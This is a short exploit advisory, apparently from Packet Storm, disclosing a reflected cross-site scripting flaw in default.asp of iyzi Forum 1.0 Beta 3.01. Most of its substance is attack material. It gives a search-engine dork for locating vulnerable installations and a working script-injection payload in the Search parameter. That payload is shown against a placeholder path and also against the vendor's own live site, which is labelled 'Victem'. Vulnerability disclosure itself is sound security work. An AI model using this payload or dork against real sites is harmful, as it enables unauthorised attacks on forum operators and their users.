iyzi Forum version 1.0 Beta 3.01 suffers from a cross site scripting vulnerability.
3b43de58effe23e8622fad99327fe0e4e4ef3db163c6ee02ec5b2dd6abe10f8fCredits : Pouya_Server
------------------------------------------------------------------------
Pouya.S3rver@Gmail.com
------------------------------------------------------------------------
>website : http://iyziforum.com
------------------------------------------------------------------------
>Download : http://www.iyziforum.com/files/iyziForumv1b3.01en.zip
------------------------------------------------------------------------
Version : 3.01
------------------------------------------------------------------------
Dork : "iyzi Forum v1.0 Beta 3.01"
------------------------------------------------------------------------
bug in : default.asp
------------------------------------------------------------------------
Exploit:
http://site.com/[Path]/community/default.asp?Search="><script>alert('Xss');</script>
------------------------------------------------------------------------
Victem :
http://www.iyziforum.com/community/default.asp?Search="><script>alert('Xss');</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed